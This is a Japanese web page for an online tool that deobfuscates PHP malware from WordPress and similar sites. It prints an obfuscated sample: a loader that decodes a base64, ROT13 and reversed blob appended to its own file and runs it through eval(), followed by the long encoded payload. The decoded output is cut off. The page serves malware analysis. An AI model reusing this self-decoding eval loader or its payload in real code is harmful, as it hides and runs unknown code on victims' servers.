Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php $L66Rgr=explode(base64_decode("Pz4="),file_get_contents(__FILE__)); $L6CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13($L66Rgr[1]))));$L7CRgr = "c3eb21c146b96c0f4138d984a1172762";preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1]);exit()...難読化されたPHPコード

<?php $L66Rgr=explode(base64_decode("Pz4="),file_get_contents(__FILE__)); $L6CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13($L66Rgr[1]))));$L7CRgr = "c3eb21c146b96c0f4138d984a1172762";preg_replace($L6CRgr[0],serialize(eval($L6CRgr[2])),$L6CRgr[1]);exit();?>=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

デコード(難読化解除)されたコード

<?php

$L66Rgr = array(0 => "<?php \$L66Rgr=explode(base64_decode(\"Pz4=\"),file_get_contents(__FILE__)); \$L6CRgr=array(base64_decode(\"L3gvaQ==\"),base64_decode(\"eA==\"),base64_decode(strrev(str_rot13(\$L66Rgr[1]))));\$L7CRgr = \"c3eb21c146b96c0f4138d984a1172762\";preg_replace(\$L6CRgr[0],serialize(eval(\$L6CRgr[2])),\$L6CRgr[1]);exit();", 1 => 